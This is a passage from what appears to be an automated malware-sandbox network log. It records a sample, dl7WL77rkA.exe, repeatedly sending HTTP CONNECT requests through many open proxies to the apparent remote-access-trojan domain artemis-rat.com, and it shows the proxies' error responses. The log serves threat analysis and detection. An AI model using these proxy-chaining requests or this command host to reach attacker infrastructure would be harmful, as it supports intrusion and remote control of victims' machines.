                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            406192.168.2.550994182.106.220.25290913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184359074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.529982090 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            407192.168.2.55104260.246.122.244803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184803963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.491148949 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.2.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            408192.168.2.551203104.21.64.208803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184987068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.339567900 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            409192.168.2.551220172.67.53.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.187443018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.342299938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            410192.168.2.551241172.67.182.83803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.189786911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.344103098 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            411192.168.2.55100479.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.190836906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            412192.168.2.55105191.189.177.18931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.201565981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.529459953 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            413192.168.2.551279172.67.69.9803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.205559015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.359790087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            414192.168.2.551235146.190.35.1180003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.205818892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            415192.168.2.551075128.140.26.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.218305111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.532059908 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.25.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            416192.168.2.55147843.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.222276926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            417192.168.2.55104191.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.222285032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            418192.168.2.55148143.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.223495007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            419192.168.2.55148743.153.174.1064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.225435972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            420192.168.2.551141184.181.217.19441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.225491047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            421192.168.2.551210172.93.111.235443743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.228209019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.748593092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.404886961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
